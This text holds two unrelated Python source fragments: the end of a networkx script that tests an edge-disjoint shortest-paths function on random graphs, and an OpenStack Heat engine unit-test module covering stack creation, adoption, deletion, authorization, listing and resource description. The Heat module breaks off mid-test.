last_node = None
index = 0
for node in filtered_path:
if last_node is not None and last_node == node:
to_cut.append(index)
last_node = node
index += 1
# during removal the indexes needs to be shifted. (or removed in
# reverse order)
index_offset = 0
for idx in to_cut:
filtered_path.pop(idx - index_offset)
index_offset += 1
tmp_node_filtered_disjoint_paths.append(filtered_path)
return tmp_node_filtered_disjoint_paths
if __name__ == '__main__':
# tests the shortest_edge_disjoint_paths function with random graphs.
# TODO: couple of times it fails to return disjoint paths
import networkx as nx
import random
random.seed(6)
for test in xrange(0,10000):
G = nx.gnm_random_graph(random.randint(20,400), random.randint(90, 3000),
directed=True, seed=test)
for i,j in G.edges_iter():
G[i][j]['weight'] = random.random()
connectivity = nx.edge_connectivity(G)
if connectivity > 1:
print "Testing with: no. %s, nodes: %s, edges: %s, connectivity: %s"%\
(test, G.number_of_nodes(), G.number_of_edges(), connectivity)
source = random.choice(G.nodes())
target = random.choice(G.nodes())
k = random.randint(2, connectivity)
try:
print "Function parameters: source: %s, target: %s, k: %s"%\
(source, target, k)
paths = shortest_edge_disjoint_paths(G, source=source, target=target, k=k)
print paths
paths_zipped = []
for p in paths:
if p[0] != source or p[-1] != target:
raise Exception("not ending/finishing in target/source!")
paths_zipped.extend(zip(p[:-1], p[1:]))
if len(set(paths_zipped)) != len(paths_zipped):
print "zipped: ", paths_zipped, "size: ", len(paths_zipped)
print "removed dups: ", set(paths_zipped), "size: ", len(set(paths_zipped))
for l in paths_zipped:
if paths_zipped.count(l) > 1:
print "dup: ", l
raise Exception("common edges of disjoint paths were found!")
except nx.NetworkXUnfeasible as nu:
print "Skipping ", test, nu.message
else:
print "Skipping ", test
| |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import mock
import mox
from oslo_config import cfg
from oslo_messaging.rpc import dispatcher
from oslo_serialization import jsonutils as json
import six
from heat.common import context
from heat.common import exception
from heat.common import identifier
from heat.common import template_format
from heat.engine.cfn import template as cfntemplate
from heat.engine import dependencies
from heat.engine import environment
from heat.engine.hot import functions as hot_functions
from heat.engine.hot import template as hottemplate
from heat.engine import resource as res
from heat.engine import service
from heat.engine import stack as parser
from heat.engine import template as templatem
from heat.objects import stack as stack_object
from heat.tests import common
from heat.tests.engine import tools
from heat.tests import generic_resource as generic_rsrc
from heat.tests.nova import fakes as fakes_nova
from heat.tests import utils
cfg.CONF.import_opt('engine_life_check_timeout', 'heat.common.config')
cfg.CONF.import_opt('enable_stack_abandon', 'heat.common.config')
wp_template_no_default = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Description" : "WordPress",
"Parameters" : {
"KeyName" : {
"Description" : "KeyName",
"Type" : "String"
}
},
"Resources" : {
"WebServer": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId" : "F17-x86_64-gold",
"InstanceType" : "m1.large",
"KeyName" : "test",
"UserData" : "wordpress"
}
}
}
}
'''
policy_template = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Description" : "alarming",
"Resources" : {
"WebServerScaleDownPolicy" : {
"Type" : "AWS::AutoScaling::ScalingPolicy",
"Properties" : {
"AdjustmentType" : "ChangeInCapacity",
"AutoScalingGroupName" : "",
"Cooldown" : "60",
"ScalingAdjustment" : "-1"
}
},
"Random" : {
"Type" : "OS::Heat::RandomString"
}
}
}
'''
user_policy_template = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Description" : "Just a User",
"Parameters" : {},
"Resources" : {
"CfnUser" : {
"Type" : "AWS::IAM::User",
"Properties" : {
"Policies" : [ { "Ref": "WebServerAccessPolicy"} ]
}
},
"WebServerAccessPolicy" : {
"Type" : "OS::Heat::AccessPolicy",
"Properties" : {
"AllowedResources" : [ "WebServer" ]
}
},
"HostKeys" : {
"Type" : "AWS::IAM::AccessKey",
"Properties" : {
"UserName" : {"Ref": "CfnUser"}
}
},
"WebServer": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId" : "F17-x86_64-gold",
"InstanceType" : "m1.large",
"KeyName" : "test",
"UserData" : "wordpress"
}
}
}
}
'''
server_config_template = '''
heat_template_version: 2013-05-23
resources:
WebServer:
type: OS::Nova::Server
'''
class StackCreateTest(common.HeatTestCase):
def setUp(self):
super(StackCreateTest, self).setUp()
def test_wordpress_single_instance_stack_create(self):
stack = tools.get_stack('test_stack', utils.dummy_context())
tools.setup_mocks(self.m, stack)
self.m.ReplayAll()
stack.store()
stack.create()
self.assertIsNotNone(stack['WebServer'])
self.assertTrue(int(stack['WebServer'].resource_id) > 0)
self.assertNotEqual(stack['WebServer'].ipaddress, '0.0.0.0')
def test_wordpress_single_instance_stack_adopt(self):
t = template_format.parse(tools.wp_template)
template = templatem.Template(t)
ctx = utils.dummy_context()
adopt_data = {
'resources': {
'WebServer': {
'resource_id': 'test-res-id'
}
}
}
stack = parser.Stack(ctx,
'test_stack',
template,
adopt_stack_data=adopt_data)
tools.setup_mocks(self.m, stack)
self.m.ReplayAll()
stack.store()
stack.adopt()
self.assertIsNotNone(stack['WebServer'])
self.assertEqual('test-res-id', stack['WebServer'].resource_id)
self.assertEqual((stack.ADOPT, stack.COMPLETE), stack.state)
def test_wordpress_single_instance_stack_adopt_fail(self):
t = template_format.parse(tools.wp_template)
template = templatem.Template(t)
ctx = utils.dummy_context()
adopt_data = {
'resources': {
'WebServer1': {
'resource_id': 'test-res-id'
}
}
}
stack = parser.Stack(ctx,
'test_stack',
template,
adopt_stack_data=adopt_data)
tools.setup_mocks(self.m, stack)
self.m.ReplayAll()
stack.store()
stack.adopt()
self.assertIsNotNone(stack['WebServer'])
expected = ('Resource ADOPT failed: Exception: resources.WebServer: '
'Resource ID was not provided.')
self.assertEqual(expected, stack.status_reason)
self.assertEqual((stack.ADOPT, stack.FAILED), stack.state)
def test_wordpress_single_instance_stack_delete(self):
ctx = utils.dummy_context()
stack = tools.get_stack('test_stack', ctx)
fc = tools.setup_mocks(self.m, stack, mock_keystone=False)
self.m.ReplayAll()
stack_id = stack.store()
stack.create()
db_s = stack_object.Stack.get_by_id(ctx, stack_id)
self.assertIsNotNone(db_s)
self.assertIsNotNone(stack['WebServer'])
self.assertTrue(int(stack['WebServer'].resource_id) > 0)
self.patchobject(fc.servers, 'delete',
side_effect=fakes_nova.fake_exception())
stack.delete()
rsrc = stack['WebServer']
self.assertEqual((rsrc.DELETE, rsrc.COMPLETE), rsrc.state)
self.assertEqual((stack.DELETE, stack.COMPLETE), rsrc.state)
self.assertIsNone(stack_object.Stack.get_by_id(ctx, stack_id))
db_s.refresh()
self.assertEqual('DELETE', db_s.action)
self.assertEqual('COMPLETE', db_s.status, )
class StackConvergenceServiceCreateUpdateTest(common.HeatTestCase):
def setUp(self):
super(StackConvergenceServiceCreateUpdateTest, self).setUp()
cfg.CONF.set_override('convergence_engine', True)
self.ctx = utils.dummy_context()
self.man = service.EngineService('a-host', 'a-topic')
def _stub_update_mocks(self, stack_to_load, stack_to_return):
self.m.StubOutWithMock(parser, 'Stack')
self.m.StubOutWithMock(parser.Stack, 'load')
parser.Stack.load(self.ctx, stack=stack_to_load
).AndReturn(stack_to_return)
self.m.StubOutWithMock(templatem, 'Template')
self.m.StubOutWithMock(environment, 'Environment')
def _test_stack_create_convergence(self, stack_name):
params = {'foo': 'bar'}
template = '{ "Template": "data" }'
stack = tools.get_stack(stack_name, self.ctx,
template=tools.string_template_five,
convergence=True)
self.m.StubOutWithMock(templatem, 'Template')
self.m.StubOutWithMock(environment, 'Environment')
self.m.StubOutWithMock(parser, 'Stack')
templatem.Template(template, files=None,
env=stack.env).AndReturn(stack.t)
environment.Environment(params).AndReturn(stack.env)
parser.Stack(self.ctx, stack.name,
stack.t, owner_id=None,
parent_resource=None,
nested_depth=0, user_creds_id=None,
stack_user_project_id=None,
timeout_mins=60,
disable_rollback=False,
convergence=True).AndReturn(stack)
self.m.StubOutWithMock(stack, 'validate')
stack.validate().AndReturn(None)
self.m.ReplayAll()
api_args = {'timeout_mins': 60, 'disable_rollback': False}
result = self.man.create_stack(self.ctx, 'service_create_test_stack',
template, params, None, api_args)
db_stack = stack_object.Stack.get_by_id(self.ctx, result['stack_id'])
self.assertEqual(db_stack.convergence, True)
self.assertEqual(result['stack_id'], db_stack.id)
self.m.VerifyAll()
def test_stack_create_enabled_convergence_engine(self):
stack_name = 'service_create_test_stack'
self._test_stack_create_convergence(stack_name)
def test_stack_update_enabled_convergence_engine(self):
stack_name = 'service_update_test_stack'
params = {'foo': 'bar'}
template = '{ "Template": "data" }'
old_stack = tools.get_stack(stack_name, self.ctx,
template=tools.string_template_five,
convergence=True)
old_stack.timeout_mins = 1
sid = old_stack.store()
s = stack_object.Stack.get_by_id(self.ctx, sid)
stack = tools.get_stack(stack_name, self.ctx,
template=tools.string_template_five_update,
convergence=True)
self._stub_update_mocks(s, old_stack)
templatem.Template(template, files=None,
env=stack.env).AndReturn(stack.t)
environment.Environment(params).AndReturn(stack.env)
parser.Stack(self.ctx, stack.name,
stack.t,
owner_id=old_stack.owner_id,
nested_depth=old_stack.nested_depth,
user_creds_id=old_stack.user_creds_id,
stack_user_project_id=old_stack.stack_user_project_id,
timeout_mins=60,
disable_rollback=False,
parent_resource=None,
strict_validate=True,
tenant_id=old_stack.tenant_id,
username=old_stack.username,
convergence=old_stack.convergence,
current_traversal=old_stack.current_traversal,
prev_raw_template_id=old_stack.prev_raw_template_id,
current_deps=old_stack.current_deps).AndReturn(stack)
self.m.StubOutWithMock(stack, 'validate')
stack.validate().AndReturn(None)
self.m.ReplayAll()
api_args = {'timeout_mins': 60, 'disable_rollback': False}
result = self.man.update_stack(self.ctx, old_stack.identifier(),
template, params, None, api_args)
self.assertEqual(old_stack.convergence, True)
self.assertEqual(old_stack.identifier(), result)
self.assertIsInstance(result, dict)
self.assertTrue(result['stack_id'])
self.m.VerifyAll()
class StackServiceAuthorizeTest(common.HeatTestCase):
def setUp(self):
super(StackServiceAuthorizeTest, self).setUp()
self.ctx = utils.dummy_context(tenant_id='stack_service_test_tenant')
self.eng = service.EngineService('a-host', 'a-topic')
self.eng.engine_id = 'engine-fake-uuid'
cfg.CONF.set_default('heat_stack_user_role', 'stack_user_role')
@tools.stack_context('service_authorize_stack_user_nocreds_test_stack')
def test_stack_authorize_stack_user_nocreds(self):
self.assertFalse(self.eng._authorize_stack_user(self.ctx,
self.stack,
'foo'))
@tools.stack_context('service_authorize_user_attribute_error_test_stack')
def test_stack_authorize_stack_user_attribute_error(self):
self.m.StubOutWithMock(json, 'loads')
json.loads(None).AndRaise(AttributeError)
self.m.ReplayAll()
self.assertFalse(self.eng._authorize_stack_user(self.ctx,
self.stack,
'foo'))
self.m.VerifyAll()
@tools.stack_context('service_authorize_stack_user_type_error_test_stack')
def test_stack_authorize_stack_user_type_error(self):
self.m.StubOutWithMock(json, 'loads')
json.loads(mox.IgnoreArg()).AndRaise(TypeError)
self.m.ReplayAll()
self.assertFalse(self.eng._authorize_stack_user(self.ctx,
self.stack,
'foo'))
self.m.VerifyAll()
def test_stack_authorize_stack_user(self):
self.ctx = utils.dummy_context()
self.ctx.aws_creds = '{"ec2Credentials": {"access": "4567"}}'
stack_name = 'stack_authorize_stack_user'
stack = tools.get_stack(stack_name, self.ctx, user_policy_template)
self.stack = stack
fc = tools.setup_mocks(self.m, stack)
self.patchobject(fc.servers, 'delete',
side_effect=fakes_nova.fake_exception())
self.m.ReplayAll()
stack.store()
stack.create()
self.assertTrue(self.eng._authorize_stack_user(
self.ctx, self.stack, 'WebServer'))
self.assertFalse(self.eng._authorize_stack_user(
self.ctx, self.stack, 'CfnUser'))
self.assertFalse(self.eng._authorize_stack_user(
self.ctx, self.stack, 'NoSuchResource'))
self.m.VerifyAll()
def test_stack_authorize_stack_user_user_id(self):
self.ctx = utils.dummy_context(user_id=str(uuid.uuid4()))
stack_name = 'stack_authorize_stack_user_user_id'
stack = tools.get_stack(stack_name, self.ctx, server_config_template)
self.stack = stack
def handler(resource_name):
return resource_name == 'WebServer'
self.stack.register_access_allowed_handler(self.ctx.user_id, handler)
# matching credential_id and resource_name
self.assertTrue(self.eng._authorize_stack_user(
self.ctx, self.stack, 'WebServer'))
# not matching resource_name
self.assertFalse(self.eng._authorize_stack_user(
self.ctx, self.stack, 'NoSuchResource'))
# not matching credential_id
self.ctx.user_id = str(uuid.uuid4())
self.assertFalse(self.eng._authorize_stack_user(
self.ctx, self.stack, 'WebServer'))
class StackServiceTest(common.HeatTestCase):
def setUp(self):
super(StackServiceTest, self).setUp()
self.ctx = utils.dummy_context(tenant_id='stack_service_test_tenant')
self.eng = service.EngineService('a-host', 'a-topic')
self.eng.thread_group_mgr = tools.DummyThreadGroupManager()
self.eng.engine_id = 'engine-fake-uuid'
cfg.CONF.set_default('heat_stack_user_role', 'stack_user_role')
@tools.stack_context('service_identify_test_stack', False)
def test_stack_identify(self):
self.m.StubOutWithMock(parser.Stack, 'load')
parser.Stack.load(self.ctx,
stack=mox.IgnoreArg()).AndReturn(self.stack)
self.m.ReplayAll()
identity = self.eng.identify_stack(self.ctx, self.stack.name)
self.assertEqual(self.stack.identifier(), identity)
self.m.VerifyAll()
@tools.stack_context('ef0c41a4-644f-447c-ad80-7eecb0becf79', False)
def test_stack_identify_by_name_in_uuid(self):
self.m.StubOutWithMock(parser.Stack, 'load')
parser.Stack.load(self.ctx,
stack=mox.IgnoreArg()).AndReturn(self.stack)
self.m.ReplayAll()
identity = self.eng.identify_stack(self.ctx, self.stack.name)
self.assertEqual(self.stack.identifier(), identity)
self.m.VerifyAll()
@tools.stack_context('service_identify_uuid_test_stack', False)
def test_stack_identify_uuid(self):
self.m.StubOutWithMock(parser.Stack, 'load')
parser.Stack.load(self.ctx,
stack=mox.IgnoreArg()).AndReturn(self.stack)
self.m.ReplayAll()
identity = self.eng.identify_stack(self.ctx, self.stack.id)
self.assertEqual(self.stack.identifier(), identity)
self.m.VerifyAll()
def test_stack_identify_nonexist(self):
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.identify_stack, self.ctx, 'wibble')
self.assertEqual(exception.StackNotFound, ex.exc_info[0])
@tools.stack_context('service_create_existing_test_stack', False)
def test_stack_create_existing(self):
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.create_stack, self.ctx,
self.stack.name, self.stack.t.t, {}, None, {})
self.assertEqual(exception.StackExists, ex.exc_info[0])
@tools.stack_context('service_name_tenants_test_stack', False)
def test_stack_by_name_tenants(self):
self.assertEqual(
self.stack.id,
stack_object.Stack.get_by_name(self.ctx, self.stack.name).id)
ctx2 = utils.dummy_context(tenant_id='stack_service_test_tenant2')
self.assertIsNone(stack_object.Stack.get_by_name(
ctx2,
self.stack.name))
@tools.stack_context('service_list_all_test_stack')
def test_stack_list_all(self):
self.m.StubOutWithMock(parser.Stack, '_from_db')
parser.Stack._from_db(
self.ctx, mox.IgnoreArg(),
resolve_data=False
).AndReturn(self.stack)
self.m.ReplayAll()
sl = self.eng.list_stacks(self.ctx)
self.assertEqual(1, len(sl))
for s in sl:
self.assertIn('creation_time', s)
self.assertIn('updated_time', s)
self.assertIn('stack_identity', s)
self.assertIsNotNone(s['stack_identity'])
self.assertIn('stack_name', s)
self.assertEqual(self.stack.name, s['stack_name'])
self.assertIn('stack_status', s)
self.assertIn('stack_status_reason', s)
self.assertIn('description', s)
self.assertIn('WordPress', s['description'])
self.m.VerifyAll()
@mock.patch.object(stack_object.Stack, 'get_all')
def test_stack_list_passes_marker_info(self, mock_stack_get_all):
limit = object()
marker = object()
sort_keys = object()
sort_dir = object()
self.eng.list_stacks(self.ctx, limit=limit, marker=marker,
sort_keys=sort_keys, sort_dir=sort_dir)
mock_stack_get_all.assert_called_once_with(self.ctx,
limit,
sort_keys,
marker,
sort_dir,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
)
@mock.patch.object(stack_object.Stack, 'get_all')
def test_stack_list_passes_filtering_info(self, mock_stack_get_all):
filters = {'foo': 'bar'}
self.eng.list_stacks(self.ctx, filters=filters)
mock_stack_get_all.assert_called_once_with(mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
filters,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
)
@mock.patch.object(stack_object.Stack, 'get_all')
def test_stack_list_tenant_safe_defaults_to_true(self, mock_stack_get_all):
self.eng.list_stacks(self.ctx)
mock_stack_get_all.assert_called_once_with(mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
True,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
)
@mock.patch.object(stack_object.Stack, 'get_all')
def test_stack_list_passes_tenant_safe_info(self, mock_stack_get_all):
self.eng.list_stacks(self.ctx, tenant_safe=False)
mock_stack_get_all.assert_called_once_with(mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
False,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
)
@mock.patch.object(stack_object.Stack, 'get_all')
def test_stack_list_show_nested(self, mock_stack_get_all):
self.eng.list_stacks(self.ctx, show_nested=True)
mock_stack_get_all.assert_called_once_with(mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
True,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
)
@mock.patch.object(stack_object.Stack, 'get_all')
def test_stack_list_show_deleted(self, mock_stack_get_all):
self.eng.list_stacks(self.ctx, show_deleted=True)
mock_stack_get_all.assert_called_once_with(mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
True,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
)
@mock.patch.object(stack_object.Stack, 'get_all')
def test_stack_list_show_hidden(self, mock_stack_get_all):
self.eng.list_stacks(self.ctx, show_hidden=True)
mock_stack_get_all.assert_called_once_with(mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
True,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
)
@mock.patch.object(stack_object.Stack, 'get_all')
def test_stack_list_tags(self, mock_stack_get_all):
self.eng.list_stacks(self.ctx, tags=['foo', 'bar'])
mock_stack_get_all.assert_called_once_with(mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
['foo', 'bar'],
mock.ANY,
mock.ANY,
mock.ANY,
)
@mock.patch.object(stack_object.Stack, 'get_all')
def test_stack_list_tags_any(self, mock_stack_get_all):
self.eng.list_stacks(self.ctx, tags_any=['foo', 'bar'])
mock_stack_get_all.assert_called_once_with(mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
['foo', 'bar'],
mock.ANY,
mock.ANY,
)
@mock.patch.object(stack_object.Stack, 'get_all')
def test_stack_list_not_tags(self, mock_stack_get_all):
self.eng.list_stacks(self.ctx, not_tags=['foo', 'bar'])
mock_stack_get_all.assert_called_once_with(mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
['foo', 'bar'],
mock.ANY,
)
@mock.patch.object(stack_object.Stack, 'get_all')
def test_stack_list_not_tags_any(self, mock_stack_get_all):
self.eng.list_stacks(self.ctx, not_tags_any=['foo', 'bar'])
mock_stack_get_all.assert_called_once_with(mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
mock.ANY,
['foo', 'bar'],
)
@mock.patch.object(stack_object.Stack, 'count_all')
def test_count_stacks_passes_filter_info(self, mock_stack_count_all):
self.eng.count_stacks(self.ctx, filters={'foo': 'bar'})
mock_stack_count_all.assert_called_once_with(mock.ANY,
filters={'foo': 'bar'},
tenant_safe=mock.ANY,
show_deleted=False,
show_nested=False,
show_hidden=False,
tags=None,
tags_any=None,
not_tags=None,
not_tags_any=None)
@mock.patch.object(stack_object.Stack, 'count_all')
def test_count_stacks_tenant_safe_default_true(self, mock_stack_count_all):
self.eng.count_stacks(self.ctx)
mock_stack_count_all.assert_called_once_with(mock.ANY,
filters=mock.ANY,
tenant_safe=True,
show_deleted=False,
show_nested=False,
show_hidden=False,
tags=None,
tags_any=None,
not_tags=None,
not_tags_any=None)
@mock.patch.object(stack_object.Stack, 'count_all')
def test_count_stacks_passes_tenant_safe_info(self, mock_stack_count_all):
self.eng.count_stacks(self.ctx, tenant_safe=False)
mock_stack_count_all.assert_called_once_with(mock.ANY,
filters=mock.ANY,
tenant_safe=False,
show_deleted=False,
show_nested=False,
show_hidden=False,
tags=None,
tags_any=None,
not_tags=None,
not_tags_any=None)
@mock.patch.object(stack_object.Stack, 'count_all')
def test_count_stacks_show_nested(self, mock_stack_count_all):
self.eng.count_stacks(self.ctx, show_nested=True)
mock_stack_count_all.assert_called_once_with(mock.ANY,
filters=mock.ANY,
tenant_safe=True,
show_deleted=False,
show_nested=True,
show_hidden=False,
tags=None,
tags_any=None,
not_tags=None,
not_tags_any=None)
@mock.patch.object(stack_object.Stack, 'count_all')
def test_count_stack_show_deleted(self, mock_stack_count_all):
self.eng.count_stacks(self.ctx, show_deleted=True)
mock_stack_count_all.assert_called_once_with(mock.ANY,
filters=mock.ANY,
tenant_safe=True,
show_deleted=True,
show_nested=False,
show_hidden=False,
tags=None,
tags_any=None,
not_tags=None,
not_tags_any=None)
@mock.patch.object(stack_object.Stack, 'count_all')
def test_count_stack_show_hidden(self, mock_stack_count_all):
self.eng.count_stacks(self.ctx, show_hidden=True)
mock_stack_count_all.assert_called_once_with(mock.ANY,
filters=mock.ANY,
tenant_safe=True,
show_deleted=False,
show_nested=False,
show_hidden=True,
tags=None,
tags_any=None,
not_tags=None,
not_tags_any=None)
@tools.stack_context('service_abandon_stack')
def test_abandon_stack(self):
cfg.CONF.set_override('enable_stack_abandon', True)
self.m.StubOutWithMock(parser.Stack, 'load')
parser.Stack.load(self.ctx,
stack=mox.IgnoreArg()).AndReturn(self.stack)
expected_res = {
u'WebServer': {
'action': 'CREATE',
'metadata': {},
'name': u'WebServer',
'resource_data': {},
'resource_id': '9999',
'status': 'COMPLETE',
'type': u'AWS::EC2::Instance'}}
self.m.ReplayAll()
ret = self.eng.abandon_stack(self.ctx, self.stack.identifier())
self.assertEqual(10, len(ret))
self.assertEqual('CREATE', ret['action'])
self.assertEqual('COMPLETE', ret['status'])
self.assertEqual('service_abandon_stack', ret['name'])
self.assertEqual({}, ret['files'])
self.assertIn('id', ret)
self.assertEqual(expected_res, ret['resources'])
self.assertEqual(self.stack.t.t, ret['template'])
self.assertIn('project_id', ret)
self.assertIn('stack_user_project_id', ret)
self.assertIn('environment', ret)
self.assertIn('files', ret)
self.m.VerifyAll()
def test_stack_describe_nonexistent(self):
non_exist_identifier = identifier.HeatIdentifier(
self.ctx.tenant_id, 'wibble',
'18d06e2e-44d3-4bef-9fbf-52480d604b02')
stack_not_found_exc = exception.StackNotFound(stack_name='test')
self.m.StubOutWithMock(service.EngineService, '_get_stack')
service.EngineService._get_stack(
self.ctx, non_exist_identifier,
show_deleted=True).AndRaise(stack_not_found_exc)
self.m.ReplayAll()
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.show_stack,
self.ctx, non_exist_identifier)
self.assertEqual(exception.StackNotFound, ex.exc_info[0])
self.m.VerifyAll()
def test_stack_describe_bad_tenant(self):
non_exist_identifier = identifier.HeatIdentifier(
'wibble', 'wibble',
'18d06e2e-44d3-4bef-9fbf-52480d604b02')
invalid_tenant_exc = exception.InvalidTenant(target='test',
actual='test')
self.m.StubOutWithMock(service.EngineService, '_get_stack')
service.EngineService._get_stack(
self.ctx, non_exist_identifier,
show_deleted=True).AndRaise(invalid_tenant_exc)
self.m.ReplayAll()
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.show_stack,
self.ctx, non_exist_identifier)
self.assertEqual(exception.InvalidTenant, ex.exc_info[0])
self.m.VerifyAll()
@tools.stack_context('service_describe_test_stack', False)
def test_stack_describe(self):
self.m.StubOutWithMock(service.EngineService, '_get_stack')
s = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
service.EngineService._get_stack(self.ctx,
self.stack.identifier(),
show_deleted=True).AndReturn(s)
self.m.ReplayAll()
sl = self.eng.show_stack(self.ctx, self.stack.identifier())
self.assertEqual(1, len(sl))
s = sl[0]
self.assertIn('creation_time', s)
self.assertIn('updated_time', s)
self.assertIn('stack_identity', s)
self.assertIsNotNone(s['stack_identity'])
self.assertIn('stack_name', s)
self.assertEqual(self.stack.name, s['stack_name'])
self.assertIn('stack_status', s)
self.assertIn('stack_status_reason', s)
self.assertIn('description', s)
self.assertIn('WordPress', s['description'])
self.assertIn('parameters', s)
self.m.VerifyAll()
@tools.stack_context('service_describe_all_test_stack', False)
def test_stack_describe_all(self):
sl = self.eng.show_stack(self.ctx, None)
self.assertEqual(1, len(sl))
s = sl[0]
self.assertIn('creation_time', s)
self.assertIn('updated_time', s)
self.assertIn('stack_identity', s)
self.assertIsNotNone(s['stack_identity'])
self.assertIn('stack_name', s)
self.assertEqual(self.stack.name, s['stack_name'])
self.assertIn('stack_status', s)
self.assertIn('stack_status_reason', s)
self.assertIn('description', s)
self.assertIn('WordPress', s['description'])
self.assertIn('parameters', s)
@mock.patch('heat.engine.template._get_template_extension_manager')
def test_list_template_versions(self, templ_mock):
class DummyMgr(object):
def names(self):
return ['a.b', 'c.d']
def __getitem__(self, item):
m = mock.MagicMock()
if item == 'a.b':
m.plugin = cfntemplate.CfnTemplate
return m
else:
m.plugin = hottemplate.HOTemplate20130523
return m
templ_mock.return_value = DummyMgr()
templates = self.eng.list_template_versions(self.ctx)
expected = [{'version': 'a.b', 'type': 'cfn'},
{'version': 'c.d', 'type': 'hot'}]
self.assertEqual(expected, templates)
@mock.patch('heat.engine.template._get_template_extension_manager')
def test_list_template_functions(self, templ_mock):
class DummyFunc1(object):
"""
Dummy Func1
Dummy Func1 Long Description
"""
class DummyFunc2(object):
"""Dummy Func2
Dummy Func2 Long Description
"""
plugin_mock = mock.Mock(
functions={'dummy1': DummyFunc1,
'dummy2': DummyFunc2,
'removed': hot_functions.Removed})
dummy_tmpl = mock.Mock(plugin=plugin_mock)
class DummyMgr(object):
def __getitem__(self, item):
return dummy_tmpl
templ_mock.return_value = DummyMgr()
functions = self.eng.list_template_functions(self.ctx, 'dummytemplate')
expected = [{'functions': 'dummy1',
'description': 'Dummy Func1'},
{'functions': 'dummy2',
'description': 'Dummy Func2'}]
self.assertEqual(sorted(expected, key=lambda k: k['functions']),
sorted(functions, key=lambda k: k['functions']))
def _test_describe_stack_resource(self):
self.m.StubOutWithMock(parser.Stack, 'load')
parser.Stack.load(self.ctx,
stack=mox.IgnoreArg()).AndReturn(self.stack)
self.m.ReplayAll()
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertIn('resource_identity', r)
self.assertIn('description', r)
self.assertIn('updated_time', r)
self.assertIn('stack_identity', r)
self.assertIsNotNone(r['stack_identity'])
self.assertIn('stack_name', r)
self.assertEqual(self.stack.name, r['stack_name'])
self.assertIn('metadata', r)
self.assertIn('resource_status', r)
self.assertIn('resource_status_reason', r)
self.assertIn('resource_type', r)
self.assertIn('physical_resource_id', r)
self.assertIn('resource_name', r)
self.assertIn('attributes', r)
self.assertEqual('WebServer', r['resource_name'])
self.m.VerifyAll()
@tools.stack_context('service_stack_resource_describe__test_stack')
def test_stack_resource_describe(self):
self._test_describe_stack_resource()
def test_stack_resource_describe_nonexist_stack(self):
non_exist_identifier = identifier.HeatIdentifier(
self.ctx.tenant_id,
'wibble',
'18d06e2e-44d3-4bef-9fbf-52480d604b02')
stack_not_found_exc = exception.StackNotFound(stack_name='test')
self.m.StubOutWithMock(service.EngineService, '_get_stack')
service.EngineService._get_stack(
self.ctx, non_exist_identifier).AndRaise(stack_not_found_exc)
self.m.ReplayAll()
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.describe_stack_resource,
self.ctx, non_exist_identifier, 'WebServer')
self.assertEqual(exception.StackNotFound, ex.exc_info[0])
self.m.VerifyAll()
@tools.stack_context('service_resource_describe_nonexist_test_stack')
def test_stack_resource_describe_nonexist_resource(self):
self.m.StubOutWithMock(parser.Stack, 'load')
parser.Stack.load(self.ctx,
stack=mox.IgnoreArg()).AndReturn(self.stack)
self.m.ReplayAll()
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.describe_stack_resource,
self.ctx, self.stack.identifier(), 'foo')
self.assertEqual(exception.ResourceNotFound, ex.exc_info[0])
self.m.VerifyAll()
@tools.stack_context('service_resource_describe_noncreated_test_stack',
create_res=False)
def test_stack_resource_describe_noncreated_resource(self):
self._test_describe_stack_resource()
@tools.stack_context('service_resource_describe_user_deny_test_stack')
def test_stack_resource_describe_stack_user_deny(self):
